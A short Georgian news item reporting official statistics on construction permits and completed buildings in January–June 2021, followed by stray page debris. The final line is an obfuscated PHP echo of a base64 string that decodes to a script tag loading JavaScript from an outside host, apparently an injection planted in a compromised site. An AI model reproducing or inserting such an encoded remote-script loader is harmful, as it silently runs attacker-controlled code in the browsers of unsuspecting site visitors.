celsiusi
ავერსი შნაიდერი
ოფიციალური დეკლარირებული მონაცემებით, საქართველოში 2021 წლის იანვარ-ივნისში გაცემულია 4400 ნებართვა (წინა წლის შესაბამის პერიოდთან შედარებით 5,5 %-ით მეტი) 2955,0 ათასი კვ.მ ფართობის შენობა-ნაგებობების მშენებლობაზე (წინა წლის შესაბამის პერიოდთან შედარებით 14,7 %- ით მეტი).
 
როგორც საქსტატის მიერ გამოქვეყნებულ მონაცემებში წერია, 2021 წლის იანვარ-ივნისში, ნებართვები გაიცა მრავალფუნქციური საცხოვრებელი კომპლექსების, სავაჭრო ობიექტების, სასტუმროების, სამრეწველო საწარმოების, სასოფლო-სამეურნეო დანიშნულების ობიექტებისა და სხვა შენობა-ნაგებობების მშენებლობაზე.
 
გაცემულ ნებართვებში შედარებით დიდი წილით წარმოდგენილია მრავალფუნქციური საცხოვრებელი კომპლექსები.
 
დამთავრებული მშენებლობების ნახევარზე მეტი ქვეყნის ოთხ რეგიონზე მოდის. კერძოდ, 27,8 % - ქ. თბილისზე, 12,6% - კახეთის რეგიონზე, 12,5 %- ქვემო ქართლის რეგიონზე, ხოლო 10,8% - მცხეთა-მთიანეთის რეგიონზე.
 
ამასთან, სულ, 2021 წლის იანვარ-ივნისში ექსპლუატაციაში მიღებულ იქნა 818,6 ათასი კვ.მ ფართობის (წინა წლის შესაბამის პერიოდთან შედარებით 7,9%-ით მეტი) 1128 ობიექტი (წინა წლის შესაბამის პერიოდთან შედარებით 39,3%-ით მეტი).
1111
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");